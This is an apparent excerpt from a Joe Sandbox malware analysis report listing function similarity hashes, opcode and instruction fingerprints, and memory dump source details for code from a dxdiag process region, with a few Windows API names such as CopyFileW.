                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: b7535c463ae1e5bcf3702ce14ffd2b5f638eb3eed67e07491a9c0359b24ec7dd
                                                                                          • Instruction ID: 9eaef7f6449a926bdd011e6bf6c7dc343cb48eef6fbbacc1f9e318c96c7b604e
                                                                                          • Opcode Fuzzy Hash: b7535c463ae1e5bcf3702ce14ffd2b5f638eb3eed67e07491a9c0359b24ec7dd
                                                                                          • Instruction Fuzzy Hash: 6891DF356053118BC718DF1AC890A2BB3F6EF9D710F19996DE8858B391E734EC01CB86
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 485f9e8018368faea3edae90e71b0f5b01441832ec9af48811220032a096e4bd
                                                                                          • Instruction ID: 0033b059549c864885c35c4736f174911fb7ab2e2a7e13fdb612373215023671
                                                                                          • Opcode Fuzzy Hash: 485f9e8018368faea3edae90e71b0f5b01441832ec9af48811220032a096e4bd
                                                                                          • Instruction Fuzzy Hash: 939168B2A083558FC714CF25945226FF7A2AFD1304F98892EE4E687382D639DD05CB4A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e7c9feb5511229040c6975bef0832900e3bf4da7ad8fb78105c9272307aa1f26
                                                                                          • Instruction ID: b41f02f2f6b88e6cf2e509950ca0ce26243347fadfbd22f941e0e6fdafa6cfa2
                                                                                          • Opcode Fuzzy Hash: e7c9feb5511229040c6975bef0832900e3bf4da7ad8fb78105c9272307aa1f26
                                                                                          • Instruction Fuzzy Hash: A3513675548311CBCB24CF14D8D15AB7B72FF9672031992ACCC816F3A9E7399802CBA9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fdd013215ce92ec85f43de91537993578af9f61c73a475c81e3a5f35ac2d727d
                                                                                          • Instruction ID: 89dc32996bb4f82fd83524c80daa36c237ca6d893dcf29b64c3826ebf43fb3a5
                                                                                          • Opcode Fuzzy Hash: fdd013215ce92ec85f43de91537993578af9f61c73a475c81e3a5f35ac2d727d
                                                                                          • Instruction Fuzzy Hash: DF817276650B018FC324CF29DC52757B7E6FB89314B188A3DE5A6C7BA0D778E4018B44
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: c76afdc892be6a1a22571e9230be0a7238928ff2fae107023b2858cfdd5236c6
                                                                                          • Instruction ID: 6ba4ddecef610ba5b17dae5e44720f787bbaa8a1dff5678383cb1f2fa5ad10f1
                                                                                          • Opcode Fuzzy Hash: c76afdc892be6a1a22571e9230be0a7238928ff2fae107023b2858cfdd5236c6
                                                                                          • Instruction Fuzzy Hash: 6A519C782067008FE7258F59C991B737792FBA5300F1A947EDA864B752C378EC81CB59
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7078c05123f608065ae0c8b19dd9d3873ceae3ccd1b74ae0e505b84a43bf3eb5
                                                                                          • Instruction ID: 30120c9cf8979c957b93fa690c701cca16999ac69deab4180fe86e3e7b3b6d10
                                                                                          • Opcode Fuzzy Hash: 7078c05123f608065ae0c8b19dd9d3873ceae3ccd1b74ae0e505b84a43bf3eb5
                                                                                          • Instruction Fuzzy Hash: 4C714873A5DAD047D328893C4C112EABA930BD7234F2DC77AE9F5873E1D5694C458349
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 268e6a86c9647423a3e0406f1efe1fb1f3a43167bedebd64417b2eb9c2239687
                                                                                          • Instruction ID: 977b48f6b738fa56d71fc5e64f14f9e1e09c3987245fa55f05f3730c3b5c7a7c
                                                                                          • Opcode Fuzzy Hash: 268e6a86c9647423a3e0406f1efe1fb1f3a43167bedebd64417b2eb9c2239687
                                                                                          • Instruction Fuzzy Hash: 2261F5B02083109FD714EF15E89166BB7F1EF92364F94891DE4C58B3A1E7788905CB5B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ee3221d44487f1b55dcfb0cb7b306b7a5088c2c108d24d47baceea343636d859
                                                                                          • Instruction ID: 18207ba011b0b7ea27b2fff4e18c5af6e6a605bfb9f785221dc3cd9b7063f5aa
                                                                                          • Opcode Fuzzy Hash: ee3221d44487f1b55dcfb0cb7b306b7a5088c2c108d24d47baceea343636d859
                                                                                          • Instruction Fuzzy Hash: CF517DB15087549FE314DF29D49435BBBE1BBC8318F054A2EE5E987390E379DA088F86
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7d03f9876956ffac6f74f0866a7bde9a035be760a6bedc0074a97e3c21121794
                                                                                          • Instruction ID: 79a636d4ef35a115cd61f203c964b336e8654c9833e22f85933b964d871e8aad
                                                                                          • Opcode Fuzzy Hash: 7d03f9876956ffac6f74f0866a7bde9a035be760a6bedc0074a97e3c21121794
                                                                                          • Instruction Fuzzy Hash: 824113B455835287CB209F289C413BBF3F1AFA2358F59455EE8C597380E738D992C36A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a46d2b8bf1cae4ec2dafeae2869696359aca197a34deded2bf42c97d4dc29283
                                                                                          • Instruction ID: 829a281dbcc55e7f17534855474bf5a201807c2c6bc85185d11bf04c5e7b1d41
                                                                                          • Opcode Fuzzy Hash: a46d2b8bf1cae4ec2dafeae2869696359aca197a34deded2bf42c97d4dc29283
                                                                                          • Instruction Fuzzy Hash: 4A515A3375AA8047D33C893C5C213EA6E834FD7234B2D836FE1B6873E1D5694856434A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b45e0e103b9fa75d561094886c53ba12757ccee8c771bf6786106a20a4d2ac4a
                                                                                          • Instruction ID: 4a7e784b138b87771e031b0ab493134f230d0f6451cb6a1be6cc007881fd3753
                                                                                          • Opcode Fuzzy Hash: b45e0e103b9fa75d561094886c53ba12757ccee8c771bf6786106a20a4d2ac4a
                                                                                          • Instruction Fuzzy Hash: A8512877F599814BD3288A3C5C213E66E934BE3330B2CC76FE5B28B3E4D5A948468345
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4c7e07812f1b8347d7007c075ffe03fcbbfb4954c80059fd09941d44e601273e
                                                                                          • Instruction ID: cd3817f91458a04e6f4698fbdec964a5fe2b941d70aabd782eb82a79c60357af
                                                                                          • Opcode Fuzzy Hash: 4c7e07812f1b8347d7007c075ffe03fcbbfb4954c80059fd09941d44e601273e
                                                                                          • Instruction Fuzzy Hash: 4751EBB060C3208AC720DF60E49132BB7F0EFA2344F40492DD9D64B761EB799908DB9B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 367c31638055309794f69e9f1362a6cfb166745821b7f7e74973013f3529307c
                                                                                          • Instruction ID: ebb8bf1014c79c05d079e5db2d04c22336d3239a7eed9d6647c290466499aa9f
                                                                                          • Opcode Fuzzy Hash: 367c31638055309794f69e9f1362a6cfb166745821b7f7e74973013f3529307c
                                                                                          • Instruction Fuzzy Hash: D0316333A218114AE754CA29CD0479632D3ABD9328F3ECAB9D465DF6D7CD3B9D138680
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 54105d90293e4b8a7fe8cebbefda0a172f6c9cbfe66afa0c85e262d0473a1c3c
                                                                                          • Instruction ID: 8a214a05a26fc8f928125f8fb48cb90f3e515442b7647201508495c5dbe42c78
                                                                                          • Opcode Fuzzy Hash: 54105d90293e4b8a7fe8cebbefda0a172f6c9cbfe66afa0c85e262d0473a1c3c
                                                                                          • Instruction Fuzzy Hash: DA4127B2B193504BD71CCF258CA275FFBA2EBC5308F16883DE5869B284CA7494078B45
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 91220374a97f5aff33aa7e71888e41c88829f78e25f822e198eb2ef461918297
                                                                                          • Instruction ID: 504e49b0b2ddc2a099550f91d12c5185d5b4ceea0bdb26274afb8cde00bc0dbb
                                                                                          • Opcode Fuzzy Hash: 91220374a97f5aff33aa7e71888e41c88829f78e25f822e198eb2ef461918297
                                                                                          • Instruction Fuzzy Hash: B5314632A083385B83249E5D8982067F7E8EBCD714F1AE12FD884E7311E574ED0147C5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 73dc7dffa9da4718634bc1df2c87a66b7a70c35b3b00ffd698cd8eaa02142161
                                                                                          • Instruction ID: d5ab4806ffe72a1369b891b0c03ce99b48dccca7df38fd9f7e726c1ee5c76a78
                                                                                          • Opcode Fuzzy Hash: 73dc7dffa9da4718634bc1df2c87a66b7a70c35b3b00ffd698cd8eaa02142161
                                                                                          • Instruction Fuzzy Hash: 250124347A0A01DBE7258B15A891BB37293FB82310FA49029E18293281DB69AC91875D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                          • Instruction ID: fc3937f92bddd9b9036211213233e27d23e83f380f16c5f831fb688d5273015d
                                                                                          • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                          • Instruction Fuzzy Hash: 8E11EC336051D40EC3158D3C84005A5BF930AD7234F59939AF4B4972E6D62A9D8B8359
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a62376ffa6d90c1baa96e3dbf302ab3dfe7742f197fede568b4cb05d9ce342f2
                                                                                          • Instruction ID: 81ebb7552e56e7d5adf40a514b1d7c04d719dbb311c9cbdb1d4034df3b6f2776
                                                                                          • Opcode Fuzzy Hash: a62376ffa6d90c1baa96e3dbf302ab3dfe7742f197fede568b4cb05d9ce342f2
                                                                                          • Instruction Fuzzy Hash: D601D4F5B00B1147D7309E11A5C0B27B2A9AF8070CF59443EED4467342DB7EEC28C69A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: dabecf6e6ddfb1cdd8269c5c9ebdc2cc04a1f760bd0808b9cf36547e64e5e14a
                                                                                          • Instruction ID: dad6f7438d27f99e102fe50886f5565f1d4720bfb2582f27d129ae765fd9d515
                                                                                          • Opcode Fuzzy Hash: dabecf6e6ddfb1cdd8269c5c9ebdc2cc04a1f760bd0808b9cf36547e64e5e14a
                                                                                          • Instruction Fuzzy Hash: EEF0E937B1551607A214DD26ACC453BB366D7C6314B295439E841E3281C979F80692B8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 676c11319c11e30e550c5dd480f93aa2d5812f95884204bdcd3370e1ab4f8030
                                                                                          • Instruction ID: c74ae76d4aeefb6f888da0d67bba939e79ddb671e6929748130615be24dd088f
                                                                                          • Opcode Fuzzy Hash: 676c11319c11e30e550c5dd480f93aa2d5812f95884204bdcd3370e1ab4f8030
                                                                                          • Instruction Fuzzy Hash: E6D022789048005BC608EB10EE12639B2688F4B2AEF00303DE443FF353CE38EC60890E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 32957ae45f5fb5a31ef22e0da77331464b0a71ff3474b199ef627a84159dc668
                                                                                          • Instruction ID: 52fe0259059b82c7cb9fb3d0f913ef24527c2e8030ec2916e1bb67edfa7a0227
                                                                                          • Opcode Fuzzy Hash: 32957ae45f5fb5a31ef22e0da77331464b0a71ff3474b199ef627a84159dc668
                                                                                          • Instruction Fuzzy Hash: 01D0122494A2994AD3068F389CA1731BBB1EF03100F442558D142DB291C7D09016865C
                                                                                          APIs
                                                                                          • CopyFileW.KERNEL32(00000000,?,00000000), ref: 00427607
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID: CopyFile
                                                                                          • String ID: <vB$B\$JC$OR
                                                                                          • API String ID: 1304948518-1094185596
                                                                                          • Opcode ID: 534c61a23f16c94dd70e9183f09d5d618cb95d249a0f73e85ffe0a6b27bbc1d3
                                                                                          • Instruction ID: 8ef9865115e3bd1ef4dc2c2120f56385b28599b8e62f1996c0c1473ca8bdbd32
                                                                                          • Opcode Fuzzy Hash: 534c61a23f16c94dd70e9183f09d5d618cb95d249a0f73e85ffe0a6b27bbc1d3
                                                                                          • Instruction Fuzzy Hash: 802180B964D340DFD3209F61A84671BBBF4FB86304F40582CE1D587291EB788515DB4A